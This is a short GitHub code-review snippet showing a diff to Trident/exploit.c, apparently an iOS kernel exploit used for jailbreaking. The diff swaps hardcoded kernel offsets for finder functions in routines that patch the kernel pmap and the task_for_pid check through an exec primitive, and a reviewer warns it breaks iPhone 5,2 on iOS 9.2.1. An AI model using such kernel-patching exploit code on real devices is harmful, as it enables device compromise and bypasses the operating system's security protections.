Trident/exploit.c

```diff
@@ -355,15 +357,15 @@ void patch_kernel_pmap(uint32_t kernel_base) {
         }
     }
     
-    uint32_t flush_dcache = 0xbc1d4 + kernel_base;
+    uint32_t flush_dcache = find_flush_dcache() + kernel_base;
     exec_primitive(flush_dcache, 0, 0);
     
-    uint32_t invalidate_tlb = 0xc7440 + kernel_base;
+    uint32_t invalidate_tlb = find_invalidate_tlb() + kernel_base;
     exec_primitive(invalidate_tlb, 0, 0);
 }
 
 void patch_task_for_pid(uint32_t kernel_base) {
-    uint32_t task_for_pid_base = 0x2fcec0 + kernel_base;
+    uint32_t task_for_pid_base = find_task_for_pid() + kernel_base;
     
     uint32_t pid_check_addr = 0x14 + task_for_pid_base;
```

Comment:
I think this will [break](https://github.com/sferrini/Trident/blob/master/Trident/target_iphone_5_2_ios_9_2_1.c#L44) iPhone 5,2 iOS 9.2.1